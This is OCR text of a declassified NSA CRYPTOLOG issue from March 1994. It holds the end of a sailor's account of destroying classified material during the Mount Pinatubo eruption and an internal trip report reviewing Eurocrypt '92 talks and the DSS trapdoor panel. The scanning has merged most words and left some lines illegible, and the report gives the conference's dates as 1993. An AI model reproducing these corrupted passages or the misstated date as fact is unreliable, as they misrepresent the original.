allPhaseI,II,andIIImaterial. Hisrationale, Ibelieve,
wasthatafterhavingpersonally seentheeruptionjusta
fewdaysago,itwasimportant todestroyasmuchaswe
couldwhilewestillhadthechance.Afterall,it would
beeasiertoaskforanothercopyofthisorthat,thanto
justifywhatwelost,whywelostitandtheextentof
compromise. HisdecisionwascertainJy thecorrectone
underthecircumstances.
Theemergency destruction ofPhaseIIandIIImate­
rialtookabout18hours.Dumpsters weremadeinto
infernos, shredders wereusedaroundtheclock.Axes
andsledgehammers wereusedforthedisk-packs and
equipment. Ofcourse,accounting fortheitems
destroyed wasimportant. Duringtheentireperiod,a
strictaccounting ofalloftheitemsdestroyed wasmain­
tained.Theresultant 92-pagedestruction reportcon­
taining5500lineitemswasanachievement initself,
considering thecircumstances underwhichthedestruc­
tionandreporting tookplace.Therewasnopower(we
hadportablegenerators hookedupoutsideofthebuild­
ing,oneortwoofwhichbelonged topersonnel fromthe
detachment); wehadbeeneatingMREsforthepast
threedays;therewaslittleornopotablewater(we
flushedthecommodes withseawater);andwewerein
themidstofanon-combatant evacuation (NEO)ofall
civiliananddependent personnel totheislandofCebu
fortransportation totheUnitedStates.Needless tosay,
therewasalotgoingonatonetime.
FOROFFICl:l ..LUS~g)l:L¥
10

DOCID: 4009689
TheMajorEruptionFOROFFICIAL USEONLY
CRYPTOLOG
March 1994
Wecontinued thedestruction ofclassified material
andtriedtoorganizethetwocommands (NSGAlNSGD)
intoonecohesiveunitasbestwecould.Buton15June,
allthatchanged. Atapproximately 1000Mount
Pinatubo eruptedagain.Thistimetheplumereportedly
reached 120,000feetorso.Butthistimewewereall
locatedatSubicBay,welloutofdangerzone,orsowe
hadbeentold.
Theveryinstantthemountain eruptedthatsecond
time,Typhoon Yuna(orYuma,Ican'trecall)happened
toblowourway.Asaresultofthateruption, aplumeof
120,000feetofashblownbythewindsofthetyphoon
notonlyblanketed ClarkAB,butwipedoutSubicBay
NavalStation,covering itwith10-12inchesofashfall­
out.Thesheerweightofashmixedwithwatertoppled
buildings leftandright.Approximately 30-40%of
SubicBay'sbuildingstructures hadcollapsed. More­
over,themagnitude oftheeruption wassogreatthatit
putmuchofthePhilippines intotaldarkness forover28
hours.Itreminded meofaNewEngland blizzard,
exceptforitscolor(destructive grey)andthesurround­
ingtemperature (90degrees).
"Gainfully employing" members ofbothNSGAand
NSGDhadnewmeaning now.Shoveling crewswere
assembled anddispatched tovariouslocations and
buildings toremovethefallenashtopreventfurther
damage andcollapse. Roadswereplowed,sidewalks
clearedandpowerlineshosedoff.Withinapproxi­
mately10days,SubicBaywasoperationally restored.Forthenextfewweeks,plansweremadetoclose
downNSGAPhilippines andtransferitspeopletoother
bases.Uponreceiptofthego-ahead, PeSordersbegan
arrivingviafaxandwithinthreeweeks,theadmincrew
hadcompleted alltransferevaluations, fitnessreports,
medicalscreenings andalloftheotherassociated paper­
workwhichnormally accompanies aPCStransfer. By
theendofJulyapproximately 85%ofthecommand had
transferred. Itwasaremarkable achievement adminis­
tratively, andatestament totheprofessionalism dis­
playedbytheadmincrew.
Theremaining weekswerelargelyspentdeinstall­
ing,inventorying andshipping over$15millionworth
ofsensitive electronic equipment fromtheOperations
Building atClarkABtoSubicBayfortransfertothe
U.S.Additionally, theclosureteam,assistedbymem­
bersofthedetachment, ensuredthatallNSGAmem­
bers'personal property (eachhousehold andbarracks
room)andPOVswerepackedandshipped.
On1September 1991atCubiPoint,abriefchange
ofcommand ceremony washeldbetween CDRBernas
andLTWickham. Lt.Wickham, nowofficially the
Commanding Officer, hadbiddenfarewell tothe
remaining fewasweboardedHawaiian Airforhome.
Tosaytheleast,itwasaneventfuleight-month tour.
Ididhowever enjoythosemonthsandhavelearned
manythingsasaresultofthem~Iwillespecially miss
thepeopleofthePhilippines andthefood.AndIwill
alwaysremember theteamworkwhichwasdisplayed
bythesailorsofNSGAClarkandNSGDSubic.Itwas
teamwork whichkeptusgoingandbroughtusthrough
90daysoffrustration, danger,anduncertainty.
Toallofyou,Godspeed.
ACKNOWLEDGMENTS
Specialthanksaredueto:
CDRBarry1.Bernas,USN,Commanding Officer;U.S.NavalSecurityGroupActivity,ClarkAB,Republic ofthe
Philippines;
LTKenneth Wickham, USN,Officer-in-Charge, U.S.NavalSecurity GroupDetachment, SubicBay,whose
staunch leadership andconcernforthesafetyofthecrewpriortoandaftertheemergency weretruly
inspirational.
FOROFFICL~L USEONIX
11

DOCID: 4009689
CRYFTOLOG
March 1994
P.L.86-36CONFIDEN'FIAL
EUROCRYPT '92
(U)Eurocrypt '92continued thestringofsuccessful
congresses sponsored bytheIACR(International Asso­
ciationforCryptologic Research). Forthefirsttime,the
meeting washostedbyanEastern(Central?) European
country:· thevenuewasBalatonfiired, Hungary; the
dates,24-28May1993.
(U)Attendance wasannounced as253,butaprelim­
inaryregistration listwhichwascirculated contained
only240names.Fromthatpreliminary list;wehavethe
following accounting, byhomeaddress, oftheregis­
trants:(U)Thereweresomeprominent "cryptologists" who
didnotattend:AdiSharnirofIsrael(we'veheardthat
hemaybypreparing abook,probably containing his
workon"differential cryptanalysis"); RonRivestand
SilvioMicaliofMIT;Canada's ClaudeCrepeau and
GillesBrassard; GusSimmons ofSandia;AgnesChan
ofNortheastern; DavidChaumofCWI,Amsterdam;
LouisGuillouofFrance,andIvanDamgard ofDen­
mark.Allofthesehavebeenmoreorlessregularatt­
nedantsatprevious IACRmeetings. Threeworld-class
mathematicians attended: ArjenLenstraofBellcore,
HaraldNiederreiter ofAustria, andAndrewOdlyzko of
BellLabs.
Germany
U.S.A.
France
Hungary
GreatBritain
Sweden
Italy
Austria
Switzerland
Netherlands
Denmark
Japan
SouthAfrica
Spain
Belgium
Norway
SouthKorea
Canada
Romania
P.R.China
Israel
Australia
Yugoslavia
Czechoslovakia
Singapore
SaudiArabia
Egypt
Finland
Ireland42
30
27
15
14
14
12
10
10
8
7
7
5
4
4
4
4
3
3
3
2
22
2
2
1
I
I
1(U)TheGeneral Chairm~m wasTiborNemetzofthe
Mathematics Institute, Hungarian Academy ofSciences.
Iunderstand thatsomepeopleexperienced difficulties
withbusconnections, butIpersonally hadnoproblems.
Asusual,Ididnotparticipate inanyofthescheduled
socialactivities, eveneschewing thecommunal lunches
anddinners. Thispolicyisprobably anerror,andinthe
futureImaytryamorefriendlyposture.
(U)RainerRueppel, theexcellent Swiss(formerly
withCryptoAG)whoisoperating afree-lance consult­
ingbusiness, chairedtheProgram Committee, which
included someofthebestresearchers Inthecommunity:
KevinMcCurley (Sandia), YvoDesmedt (University of
Wisconsin, Milwaukee), JoanFeigenbaum (BellLabs),
JovanGolic(University ofBelgrade), TorHelleseth
(University ofBergen) PeterLandrock (University of
Arhus),Tatsuaki Okamoto (NTTLabs),Jennifer
Seberry (University ofNewSouthWales,Australia),
Othmar Staffelbach (Gretag), Jacques Stem(ENS­
DMI),andIstvanVajda(University ofBudapest.)
(U)Ofthe88paperssubmitted, 54wereevaluated
favorably, butonly35couldbeaccepted. Theleading
countries, withtheiracceptances/submissions, were:
USA 8/14
Germany 7/13
Japan 4/12
France 3/7
Onewassubmitted fromRussia,twofromChina.
TheProgram Committee alsoservedaschairmen forthe
sessions...
12P.L.86-36
EO1.4.(d)CONFHlENTML

DOCID: 4009689 CONFIDENTIAL
CRYPTOLOG
March 1994
(U)Theprogram was(forme)awkwardly scheduled
(maybeitwasconvenient forsomeEuropeans who
coulddrivefromhomeinamorning). Inthepastthere
hadbeenalivelyinformal rumpsessiononTuesday
night,astherewasagainthisyear,butincompensation
Tuesday afternoon hadalwaysbeenleftfree.Thisyear
thefreetimewasMonday morning (!),andTuesday
afternoon from4:00till6:00wasdevotedtoapoten­
tiallycontroversial paneldiscussion on"trapdoor
primesandmoduli," sotherewaslittlerespitefromthe
concentrated dosageofresearch reports. Altogether 34
paperswerepresented (onecancelled), eachallotted15
to30minutes, andtheschedule wasadheredtofairly
strictly(good!). Theorderoftheprogram, whichwill
befollowed inthisreport,wasasfollows:
Mondayafternoon: secretsharing,hashfunctions.
Tuesdaymorning: blockciphers,streamciphers.
Tuesday afternoon: publickeyI,factoring, panel
discussion.
Wednesday morning: publickeyII,pseudorandom
permutation generators.
Wednesday afternoon: complexity theoryandcryp­
tography I,zero-knowledge.
Thursday morning: digitalsignatures andelectronic
cash,complexity theoryandcryptography II.
(U)Threeofthelastfoursessionswereofnovalue
whatever, andindeedtherewasalmostnothingatEuroc­
rypttointerestus(thisisgoodnews!).Thescholarship
wasactuallyextremely good;it'sjustthatthedirections
whichexternalcryptologic researchers havetakenare
remarkably farfromourownlinesofinterest.
(U)Therewerenoproposals ofcryptosystems, no
novelcryptanalysis ofolddesigns,evenverylittleon
hardware design.Ireallydon'tseehowthingscould
havebeenanybetterforourpurposes. Wecanhopethat
theabsenteecryptologists stayedawaybecausetheyhad
nonewideas,oreventhatthey'vetakenaninterestin
otherareasofresearch.
(U)Ihadthoughtofofferingarepresentative "theo­
rem"fromeachofthepapers,soyoucouldjudgefor
yourself thatthepaperwaswithoutinterest(thatis,
excepttothesmallnumberofresearchers whoseliveli­
hooddependsuponbeingabletopublishinthatfield),
butmostofthemrequireelaborate definitions ofterms
orsymbols, andthatextensive areviewismeritedin
onlyafewcases.
(U)Also,itshouldbenotedthatinsomecases
authorshad,inthetimebetweensubmitting theprelimi­
naryabstract anddelivering thetalk,significantlyimproved (orcorrected) thepresentation. Insuchcases,
thechangewasusuallygreatenough',andmyunder­
standingsopoor,thatinsteadoftrustingmymemory for
whatwassaidIshallusuallyrelyontheprintedabstract.
(U)Thefirstsixpaperswereonsecretsharing(2)
andhashfunctions (4).AlfredoDeSantis (University of
Palermo) spokeon"Graphdecompositions andsecret­
sharingschemes," asillytopicwhichbringsjoytocom­
binatorists andyawnstoeveryone else.GusSimmons,
DougStinson,andMarijkedeSoetearethebignames
here,andStinsonisacoauthor ofthecurrentwork,
alongwiththeItaliansC.BlundoandU.Vaccaro.
(U)YvoDesmedt, the"madBelgian," seemstohave
caughtonattheUniversity ofWisconsin, Milwaukee.
He'salsobeengettingrespectfromtheIACR,beingon
theProgram Committee andalsoontheBoardofDirec­
tors.Asbefitsapersonofhonor,henolongerrattlesthe
rafterswithhisstaccatodelivery, buthisinteresttous
hasnotchanged. Hisofferingthisyearwas"Classifica­
tionsofidealhomomorphic threshold schemes over
finiteAbeliangroups." HisstudentYairFrankelislisted
ascoauthor.
(U)Thesessiononhashfunctions wasasinteresting
asany.MarcGirault(SEPT,Caen,France)ledoff.His
coauthors wereHenriGilbert,whohasdonesomegood
workinthepastonFEAL,andThierryBaritaud, bothof
CNET,Paris,with"FFf-hashing isnotcollision-free," a
criticism ofClausSchnorr's hashfunction scheme
whichhadbeenpresented attherumpsessionofCrypto
'91.Unfortunately theirworkwas,asGiraultadmitted,
"essentially thesame"astheattackbyDaemen, Bosse­
laers,Govaerts, andVandewalle givenattherumpses­
sionofAsiacrypt '91.
(U)Buthavenosympathy forthemuch-maligned
Professor Schnorr(University ofFrankfurt)! Inanoft­
replayed scenario, hewasthenextspeaker, andpre­
sented("FFf-Hash II:efficientcryptographic hashing")
asmallrevisionofhissulliedscheme. Perhapsitisben­
eficialtobeattacked, foryoucaneasilyaugment your
publication listbyofferingamodification.
(U)JimMasseyisaprominent American scholar
andeducator (he'sbeenattheSwissFederalInstituteof
Technology, ETH,formanyyears,andhasproduced
severalofthebestyoungcryptologic researchers)
whosemostrecentdoctoral student-he's justcom­
pletedhisdegree,butIdon'tknowwherehe'llgo
next-Xuejia Lai,presented theirjointeffort,"Hash
functions basedonblockciphers." Ahashfunction isa
specialtypeoffunctionwhichcollapses longmessages
CONF'fBENl'IAL
13

DocrD: 4009689R.L.86-36~~~ EO1.4.(c)
. .
',.
intoacompressed representation; onethinksoftheir
application asbeinginsigDa.ture orauthentication
schemes ratherthanencryption: ·\.LaiandMasseypre­
sentedsomesoundtheoretical amilysis inthecasethat
thefunction isconstructed byiterating aneasilycom­
pUlablefunction. Asusual,allthefuric~ons considered
areverygeneral; nospecificproposal·.js considered.
Theyconclude thatitisnoteasytoprodu:~ehashfunc­
tionswhichsatisfytheusualsecurityconcerns.
~Onespecifichashfunction whichhasb~enpro­
posedisRonRivest'sMD5algorithm, whichprodllces a
128-bitoutputforaninputmessageofarbitrary le~gth.
TomBerson, inaveryinteresting paper,"Differertt.ial
cryptanalysis mod-232withapplications toMD5/'
showed thatthepopular "differential cryptanalysis",
techniue,introduced outsidebAdiShamir
canbeapplied effectively inthissituation.
...............-,,-J,arnir'smethodhassofarbeenusedonlyinattacking
systems whichuseaddition modulo 2,butBerson
showedthatitcanbeadaptedtofitthemod-232addition
ofMD5.Thiswouldnothavebeenaparticularly attrac­
tivepieceofwork,butBersoncarriedoutquiteabitof
trickyanalysis, showing commendable analyticpower.
BersonistheretiringPresident oftheIACR,butIhad
noprevious knowledge ofhistechnical prowess. His
workappliesonlytoasingleroundoftheMD5process
andwillprobably notcausearevisionofthealgorithm,
asthereisnoreasontothinkthatconsecutive rounds
canbeattacked simultaneously. Inparticular, Berson's
attackposesnothreattotheNIST"securehashstan­
dard,"whichisbasedonMD4.
(U)ThebusyTuesday beganwiththreetalkson
blockciphers. Thefirstrepresented aMitsubishi attack
ontheNTTFEALalgorithm. Ithasbecomepopularto
pickonPEAL,andseveralotherattackshavebeenpre­
sentedatIACRconferences. Thisoneisagainbased
uponpossession ofmatched plainandcipher,andseems
torequirequiteabitlessthanitspredecessors. They
(Mitsuru MatsuiandAtsuhiro Yamagichi, "Anew
methodforaknown-plaintext attackonFEALcipher")
claimtobeabletosolveFEAL-4 with5plaintexts(and
350seconds ofprocessing), FEAL-6 with100plain
texts(and40minutesofprocessing), andFEAL-8 with
215plaintexts(buttheircomputer isnotlargeenoughto
seethisthrough).
(U)KaisaNyberg,oftheFinnishDefense Forces,
nowgivesaBonnaddress(maybeshe'satsomejoint
European command). Shehasbeendoinggoodwork
forseveralyears,andhertalk"Ontheconstruction of
highlynonlinear permutations" wasnotdisappointing.HerinterestliesinFourierspectraofBoolean functions
andsheisparticularly enamored ofbentfunctions. She
definedthenonlinearity N(f)ofafunctionI:F"~pn
tobetheminimum (Hamming) distancefromItotheset
ofaffinefunctions-that is,jandanyaffinefunction on
F"differbyatleastN(f)(andinatleastonecasediffer
byexactlyN(j)valuesintheirtruth-table representa­
tion.Shewasabletocompute N(f)forquadratic forms,
andsheaskedifthemaximal nonlinearity attainedby
quadratic functions wasindeedmaximal forallfunc­
tions(ofcourse,onlythecaseofoddnisinquestion).
Again,thisisnotnew and exciting work,butshe
showedconsiderable technique inherinvestigations.
(U)AnEastGerman, RalphWernsdorf (SITGesell­
schaftfurSystemderInformationstechnik mbH,Grtin­
heide;MarkKingsaidthathehadbeentoldbyhis
German friendsthatthiscompany wascomposed ofex­
Stasipeople), presented thetalk"Theone-round func­
tionsoftheDESgenerate thealternating group." This
resulthasnocryptanalytic application, butitservesto
answeraquestion whichsomeone withnothingelseto
thinkaboutmighthaveasked.Ithinkallofuswould
havebeensurprised iftheresulthadbeenotherwise, and
indeedallearlierresearch onthisproblem hadpointed
tothisanswer. Everyone feelsthatinfactthesame
resultholdstruefor16-round DESfunctions (andthisis
thequestion thatreallymeritsresearch), andsomeone
willinthenearfutureprovethis,thoughitmaybecon­
siderably moredaunting technically.
(U)Thethree-paper sessiononstreamcipherswas
shortened whenLukeO'Connor (Waterloo) failedto
appeartopresent"Suffixtreesandsequence complex­
ity,"butfromtheabstract wecanseewhathehadin
mind.HehasseenRainerRueppel's beautiful workon
thelinearcomplexity ofasequence (thelengthofthe
shortest linearshiftregister whichwillgenerate the
sequence), heisinterested inusingKolmogorov com­
plexitytogeneralized thefinitecasetoa"semi-infinite"
analogue, andheattempts todealwiththe"complexity"
(thatis,usinganyfunction, notnecessarily linear).Now
themethods oneshoulduseinthiscasearequitediffer­
ent,andheseemstobeincorrect ononematter(he
"proves" atheorem whichsaysthattheexpected degree
ofarandomfunctionofnvariables isnearn/2-I'm no
statistician, andIknowstatisticians canprovewonder­
fulthings).Heproduced areallyquiteremarkable com­
puterstudy(Idon'tseehowitcouldpossibly betrue,
butcomputer scientists havemarvelous powerstoo)of
thespansoffunctions whichgenerate 100,000 32-bit
sequences.
CONFtB~N'I'IAL
14

DOCID: 4009689CONFIBENTIAL
CRYPTOLOG
March 1994
(U)Evenifhisresultsarecorrect(andIhaveon
manyoccasions beenshownhowsimplethesethings
aretounderstand), theworkis,asviewedbycryptana­
lyticeyes,typicalofmuchofthebestworkpresented at
thisconference: itmaybegoodstatistics (ormathemat­
ics,orcomputer science, orphilosophy) butitisnot
goodcryptanalysis. Themethods employed wouldno
doubtmakearesearcher intheappropriate sciencequite
comfortable, butItendtofindthemmystifying.
(U)TheO'Connor talkwasreplaced byatalkwhich
had,strangely, beenscheduled tobepresented atthe
rumpsession! RafiHeiman (Bellcore), probably an
Israeli,talkedabout"Secureaudioteleconferencing: a
practical solution." Hisconcernisinpermitting confer­
encecallsthroughacentral"bridge" withoutthebridge
beingabletomonitor theconversation. Thereare
clearlyagreatmanyproblems tobesolved,andhewas
ableto giveusanactualaudiodemonstration ofhowthe
enciphered speechwouldsound.Iwascertainly not
impressed, butthenI'venevertriedtodoit.Certainly
securityhasnotplayedanimportant roleinhiscon­
cerns.
(U)Theothertwotalkswereauthored byJovan
Golic,oftheInstituteofAppliedMathematics andElec­
tronics,SchoolofElectrical Engineering, University of
Belgrade. GolichasbeenactiveatotherIACRmeetings
(bothatrecentEurocrypts andatAuscrypt) buthiswork
hasnever inspired me.Hispresentation wasverygood,
butthecollection ofabstracts didnotincludehispaper
"Correlation vialinearsequential circuitapproximation
ofcombiners;" instead,thereweretwocopiesof"Con­
vergence ofaBayesian iterativeerror-correction proce­
dureonanoisyshift-register sequence," presented by
hismuchlesseffective coauthor Miodrag J.Mihajlevic,
whichprovided uswithyetathirdcopy.ThefirstGolic
talkconcerned combiners withmemory, andconsidered
theirlinearapproximations.
(U)Tuesday afternoon beganwiththreetalkson
public-key systems. ThefirstwasgivenbyBirgitPfitz­
mann(University ofHildesheim), whosecoauthor was
MichaelWaidner(University ofKarlsruhe), "Attacks on
protocols forserver-aided RSAcomputation." Theyare
attacking aprotocol presented atCrypto'88byMatsu­
moto,Kato,andImaionspeeding upsecretcomputa­
tionswithinsecure auxiliary devices. Essentially they
envisionasmartcardwhichinteracts withamuchmore
powerful "server," whichisregarded asuntrustworthy.
TheJapanese researchers hadconcocted anRSA-based
scheme,buttheGermans havefoundanattackwhich
putsitssecurityunderashade.Wewerecertainly not
interested intheoriginalscheme,buttheattackshowsacertainamountofanalyticability,andthepaperisworth
atleastcasualstudy.
(U)AnotherGerman effort,"Resource requirements
fortheapplication ofadditionchainsinmodular expo­
nentiation" byJorgSauerbrey andAndreas Dietel
(Technical University ofMunich), reallyhadnocrypto­
logiccomponent, beingconcerned onlywiththespeed
ofcarryingoutmodular exponentiation.
(U)Theallegation (almostcertainly correct) that
certainpublic-key systemsmightbeimplemented more
securelybyusingellipticcurveshasproduced thepre­
dictablespateofpapersonellipticcurves.Wewerefor­
tunatetohaveonlytwosuchtalksonthecurrentagenda.
One("Public-key cryptosystems withverysmallkey
lengths") wasbyScottVanstone (Waterloo), working
withhisstudents GregHarperandAlfredMenezes (the
latterspokeverywellatlastyear'sCrypto).Thoughthe
emphasis wasundeniably mathematics ratherthancryp­
tology,Ithoughtthematerial waswellpresented, and
thatVanstone neverlostsightoftheconnection.
(U)ThesamecouldnotbesaidofBrandon Dixon's
talk"Massively parallelellipticcurvefactoring." Dixon
(Princeton; hiscoauthor isBellcore's AIjenLenstra) is
obviously averysmartguyandaclevercomputer scien­
tist,buthistalkwasdevotedwhollytodescribing the
implementation oftheellipticcurvefactorization
methodonaSIMD(singleinstruction, multiple data)
massively parallelcomputer. Thetalkwasverystimu­
lating,wellorganized, andprovided ausefulupdateon
progress inthisareaofresearch, butitcontained no
cryptology.
(U)IthinkIhavehammered homemypointoften
enoughthatIshallregarditasproved(byemphatic
enunciation): thetendency atIACRmeetings isforaca­
demicscientists (mathematicians, computer scientists,
engineers, andphilosophers masquerading astheoretical
computer scientists) topresentcommendable research
papers(intheirownareas)whichmightaffectcryptol­
ogyatsomefuturetimeor(morelikely)insomeother
world.Naturally thisisnotanathema tous.
(U)Themostinteresting partofthe1992Eurocrypt
wasthepaneldiscussion on"trapdoor primesandmod­
uli."Letussetthestagefortheuninformed. Oneofthe
mostcriticalissuesfacingtheinternational cryptologic
community (andalsoNSA)istheestablishment ofuni­
versalstandards forvariouscryptologic needs.Interna­
tionaltradeandbanking people,especially, are
clamoring forasecurity systemwhichtheymayuseas
thoughitweresecure(theycareverylittleaboutsecu-
CONFIBENTIAL
15
---------

DOCID: 4009689"nun..."". I"'\,~"""IrIU'~'U,...
March 1994CONFIBENTbt\L
rity,ofcourse,butverymuchaboutadverselawsuits).
TheAmerican NIST,whichsetsourpolicyonthese
matters, needstoconsider agreatnumberofissuesin
settingstandards (itseemsthateveryone elseexpects
American recommendation tobecome theinternational
standard). NISThasrecently announced itsendorse­
mentof(avariantof)ElGamal's public-key systemfor
the"digitalsignature standard."
~his decision hasbeenvigorously criticized by
theRSAcompany, whichhadhopedtorealizeanenor­
mousprofitfromthe(American) patentitholdsonthe
popular"RSA"algorithm. Ofcourse,whilethroughout
werefertotheextremely popularalgorithm as"RSA,"it
wasinfactfirstconceived byGCHQ's CliffCocks,fol­
lowingtheintroduction of"nonsecret encryption" ideas
(Note:nowknownas"public-key cryptosystems") by
JamesEllis,alsoofGCHQ. Thispoorlykeptsecrethas
neverbeenacknowledged publicly, andisstillCONFI­
DENTIAL.
(U)NISTcameunderfireimmediately, anditsposi­
tionbecameevenlesscomfortable whentheeminent
numbertheoristArjenLenstra(Bellcore) demonstrated
thatsomethechoicesofparameters- fortheproposed
systemwouldbeunexpectedly weak.Lenstraappar­
entlysubmitted apapertoEurocrypt, buttheProgram
Committee decidedthattheissuedeserved morecareful
attention, sotheyconvened apaneldiscussion, which
provedtobeanexceptionally wisedecision. Itwasalso
thoughtthatEurocrypt wasanappropriate venuefordis­
cussion, asthedebateinAmerica hasacquired acertain
amountofrancor.
(U)Thepanelists wereavariedlot.ArjenLenstra
andAndrewOdlyzko aremathematicians ofthehighest
order.RainerRueppel andKevinMcCurley areexcel­
lentcryptomathematicians. MilesSrnid,aformerNSA
employee (many years ago)nowwithNIST,lacksthe
technical abilityoftheothersbutis,ofcourse,themost
familiar withtheissuesandtheirrelativeimportance.
PeterLandrock isacapablemathematician, thenew
president oftheIACR,andYvoDesmedt haspublished
anumberofpapers.LenstraisDutch,Desmedt Belgian,
Rueppel Swiss,Landrock Danish, Odlyzko Polish­
American, andMcCurley andSrnidareAmericans.
(U)Thepanelconcluded thattheRSA'sardent
objections werebasedalmostexclusively onfinancial
grounds, andweretherefore without merit.Theydis­
cussedthetwosystems andfoundlittletochoose
between them.Everyone knewthatthepatentdifficulty
(whichappliesonlyintheUnitedStates)hadinfluenced
NIST'sdecision, butnopanelist quarrelled withthechoice.Theyallagreedthatthedifficulty whichLenstra
hadfoundwasextremely subtle(soisunlikely tohave
beenintentionally designed) andwouldbemost
unlikelytooccurbychance.
(U)Rueppel, playing the"neutral Swiss"role,
sketched themanyinterestgroupswhichneededtobe
considered, anddescribed thealgorithm whichhadbeen
selected. Lenstradetailed thethreatstosecurity, and
emphasized theeasewithwhichacleverprogrammer
could,withlittledangerofdetection, sabotage another­
wisesecuresystem. Hedescribed thestateoftheartof
solvingthe"discrete logarithm" problem, andcoun­
selledtheacceptance ofa1024-bitvariable (agreedto
bySrnid),sayingthata512-bitvariableprovided only
marginal security.
(U)Smidwasthecentralspeaker,andclearlyfelt
himselftobeunderattack.Heespecially resented the
impliedsluronhischaracter thatthetrapdoor insinua­
tionrepresented, andallowedhissensitivity topreventa
balanced presentation.
(U)McCurley, sometimes alittletoocleverinmak­
ingallusions toeventsorpeoplewhowouldbeunfamil­
iartomuchoftheaudience, madethevalidpointthat
DESandDSShavebeenthemostchallenged cryptosys­
ternsessentially because theyweredesigned bythe
(untrustworthy!) U.S.government. Hementioned the
"BidenBill"(Senatebill266)which,hesaid,authorized
trapdoors inanefforttoentrapdrugdealers. Hecasti­
gatedaWallStreetJournal article,.whichhaddescribed
theLenstraattackas"potentially devastating," andLen­
straagreedthathehadnotusedsuchlanguage. McCur­
leydisplayed a2-pagecartoon(whichhesaidhad
appeared inApril,1992Discover Magazine) which
badlydistorted thefactsofthecase.Iinferredfromhis
wordsthathefeltthecartoonhadbeeninspiredbyRSA
orbyonetheircronies.
(U)Desmedt referred toaletterwrittenbyMarty
Hellman criticizing NIST.Ihadallbutforgotten about
Hellman; hehasnotbeenactiveoncryptologic scenein
manyyears,andI'vealwayshaddoubtsabouthismoral
principles (bycontrast, IregardRivestasbeingabove
allthisdirt).Desmedt (andseveralotherspeakers) men­
tionedthattrapdoors areamoresevereproblem for
RSAthanforthechosenDSS.
(U)Odlyzko, alwaysastimulating speakeranddeep
thinker,described trapdoors asa"minordistraction" and
theriskduetotrapdoors as"insignificant" relativetothe
importance ofanextended keylength.Heregards512
bitsas"do-able inacoupleofyears,"768bitsas"do-
CONFIBENTlAL
16

DO~P'~. (~p09689
P.L.86-36CONFIDEN'FIAL
CRYPTOLOG
March 1994
ableinmaybe10years"and1024bitsas"maybenot
outofreach."Hegaveanassessment oftheimportance
ofenhanced computational power(increased byabout
103to104overthepast15years:wecouldfactor38-to
45-digitnumbers in1977,115-to129-digit numbers
now)relative toalgorithmic improvements, and
described thatproportion as"typical."
(U)Landrock seemstohavemissedtheimportance
ofthemoment. Heinsistedontalkingofsomeofhis
ownresearchandoverstated itsimportance tofactoring
andtotrapdoors.
~JimBidzos,theaggressive RSArepresentative,
wasunabletoattend,butcurmudgeon WhitDiffiepre­
sentedafrailRSAposition(Bidzoswouldhavemuch
moreimplacable) andwasessentially ignoredbythe
panel.JimMasseypressedSmidgentlyonwhyRSA,
described (byRSA,butalsobyothersaswell,andnot
withoutgoodreason)asadefactostandard, hadnot
beenselected. Ithinkeveryone understood thatfinan­
cialmotivesweighed heavilyinthedecision andinthe
subsequent quarrels. Apparently thepatentissueeven
nowhasnotbeenresolved. Onewonders aboutthe
motives(andprobability ofsuccess)oftheappellants.
StuartHaberofBellcore askedhowNISTwouldskirt
theexportability difficulty. Theresponse wasthatany
algorithm designed principally forencryption willprob­
ablyrunafouloftheStateDepartment's restriction,
whileanalgorithm deemedtoapplytoauthentication
noromoo'onlyCnmm=', moreloni"",'","dMds.i
(U)Afewotherquestion wereaskedbytheaudi­
ence,buttheywereeitherinnocuous ortootechnical to
beincluded thisinformal tripreport.
(U)Tuesday's night'srumpsession,asalways,wasa
mixedbag.Thechairman wasLaszloCsirmaz of
Budapest, whoisunknown tome.Infact,noneofthe
Hungarians presentmadeanyimpactonthetechnical
side,nordoIremember themfortheirpastcontribution
(exceptNemetz, whoisnotyetacryptologist). I
attendedonlythefirst10(of12)talks,wandering offto
bedat10:30.
(U)KenjiKoyama ofNITpresented "Securecon­
ference-key distribution schemes forconspiracy
attacks." Koyama's proposal surfacedfirstatEurocrypt
'88.AtAsiacrypt '91a"conspiratorial attack"(by
ShimboandKawamura), inwhichtwoormoreusers
conspire toovercome securityefforts,sentKoyama
backtothedrawing board.Hehasnowannounced a
modestmodification.(U)RafiHeimanreturnedwith"Anoteondiscrete
logarithms withspecialstructure." Hehasaninteresting
goal:supposethatweknowthattheelements whose
logarithms weneedtoabletofindsatisfysomespecial
condition (suchasasmallHamming weight). Canan
algorithm befoundwhichhastimeontheorderofthe
squareroot?Heimanhasbeenunsuccessful, andulti­
matelythisproblem isunlikelytocontribute much,but
itwouldbeasignificant achievement ifitcouldbe
resolvedintheaffirmative (orinthenegative!)
(U)UeliMaurer,whoataverytenderagehasestab­
lishedhimselfasamajorcontributor (he'soneofMas­
sey'sstudents, andisstillatETHZurich), spokeon
noninteractive key-distribution systems. Icouldn't see
thathehadmusttosay,buthesaiditverywell.Nine
minutesisnotmuchtimetopresentatalk,buthissen­
tencescontainmuchmorethanmost.
(U)Another talkwithanexcellent speaker was
"Implementation ofanellipticcurvecryptosystem,"
presented byCanadian GordonAgnew,representing
jointworkwithRonMullinandScottVanstone, allof
Waterloo. Hedescribed theirimplementation ofdis­
creteexponentiation inGF(2593).Theirmostrecent
effortinvolved anoptimalnormalbasisstructure inGF
(2155).Idon'thaveenoughcomputer scienceknowl­
edgetoassesstheirprogress, butIreporttoyouthat
theyutilizedalimitedinstruction setandfewerthan
11,000gates.Theyattaina40MHzclockspeedand,
usingaMotorola 68030,theyclaim<flthroughput of60
Kbpsimplemented onlessthan1squaremil(lessthan
4%oftheareaofasmartcard).
(U)IvanDamgard andLi-dongChen(sheisastu­
dentofLandrock atArhus,whereDamgard alsoworks)
presented "Security boundsforparallelversions ofID
protocols." Fortunato Pesarin(ofthestatistics depart­
mentatPalermo) laidthebiggesteggwith"Onrandom­
izedciphersystems," butcountryman AndreaSgarro
(aninformation theoristatTrieste)didbetterwith
"Information-theoretic bounds forauthentication
codes."
(U)PeterMathys(he'seitherSwissorAustrian, but
he'sbeenatColorado forquiteawhile)presented "A
fastserialencryption algorithm basedonrandomtrans­
positions," andBelgrade's Golicgaveanotherreason­
ableperformance with"Ageneralized correlation attack
withaprobabilistic constrained editdistance" (an
improvement, hesays,ontheconstrained Levenstein
distance,ifyouknowwhatthatis).
CONFIDENTIAL
17

DOCID: 4009689,",ovnTnl n~
'"'I•rI""'.....,"'"
March 1994CONFfDEN'f'IAL
(U)Therewasanothertalk,byKeiichiIwamura, but
itseemedtobeasubsetofthetalkhewastogivethe
following day,sowenowtumtothatprogram, devoted
topublic-key cryptosystems. Iwamura isattheCanon
